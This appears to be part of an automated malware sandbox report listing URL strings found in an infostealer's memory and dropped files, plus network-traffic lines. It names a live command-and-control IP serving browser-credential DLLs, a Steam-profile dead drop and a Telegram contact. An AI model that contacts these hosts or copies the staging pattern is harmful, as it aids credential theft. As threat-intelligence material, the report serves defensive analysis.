Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue[1].dll.4.dr, mozglue.dll.4.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000004.00000002.2203698860.0000000013D03000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.4.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://95.217.246.168
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000013CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/%
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/0
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/IDBKEBFCBFIIIIIECGDAE
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/freebl3.dll2
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/freebl3.dll8
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/mozglue.dllL
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/mozglue.dllP
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/msvcp140.dll
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/msvcp140.dlln
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001386000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/nss3.dll&
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001386000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/nss3.dllp
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/s:
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/softokn3.dll
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/softokn3.dllx
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/sqln.dll
Source: RegAsm.exe, 00000004.00000002.2202047159.000000000130B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168/vcruntime140.dll
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168KFB
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.246.168KJD
Source: CBAFIDAE.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: CBAFIDAE.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: CBAFIDAE.4.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: CBAFIDAE.4.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=98m_
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=3gW5J8_jG_Yc&l=e
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: CBAFIDAE.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: CBAFIDAE.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: CBAFIDAE.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com//
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
Source: file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543i
Source: RegAsm.exe, 00000004.00000002.2202047159.00000000012EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543x
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, KJJECGHJ.4.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: KJJECGHJ.4.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp, KJJECGHJ.4.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: KJJECGHJ.4.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82
Source: file.exe, 00000000.00000002.1704034224.00000000008FF000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82At
Source: mozglue[1].dll.4.dr, freebl3.dll.4.dr, softokn3[1].dll.4.dr, mozglue.dll.4.dr, softokn3.dll.4.dr, nss3[1].dll.4.dr, freebl3[1].dll.4.dr, nss3.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CBAFIDAE.4.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: CBAFIDAE.4.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.2202047159.0000000001323000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.4.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
